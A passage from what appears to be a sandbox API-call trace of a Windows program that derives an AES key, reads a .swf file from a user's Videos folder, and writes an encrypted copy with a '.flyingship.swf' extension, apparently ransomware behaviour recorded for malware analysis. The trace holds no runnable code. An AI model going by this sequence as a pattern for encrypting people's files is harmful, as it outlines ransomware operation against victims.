wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0193.184] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.184] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0193.184] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0193.184] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.184] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0193.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0193.185] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.185] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0193.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0193.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.185] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.185] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0193.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.185] CryptDestroyHash (hHash=0x90af58) returned 1 [0193.185] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0193.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0193.186] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\vgkx.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0193.187] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.187] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0193.187] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.187] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0193.187] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\vgkx.flyingship.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0193.188] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.189] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0193.189] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.189] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.189] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0193.189] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0193.192] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4d15, lpOverlapped=0x0) returned 1 [0193.192] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0193.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0193.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0193.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0193.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.194] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0193.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0193.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.195] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0193.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0193.195] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.195] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0193.195] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.195] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0193.195] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0193.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.195] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2788, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2788*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0193.195] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.195] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0193.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.196] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.196] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0193.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.196] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.196] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.196] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0193.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0193.197] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.197] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x14d15, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x14d20) returned 1 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0193.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0193.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0193.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0193.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0193.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0193.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0193.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0193.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0193.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0193.200] HeapFree 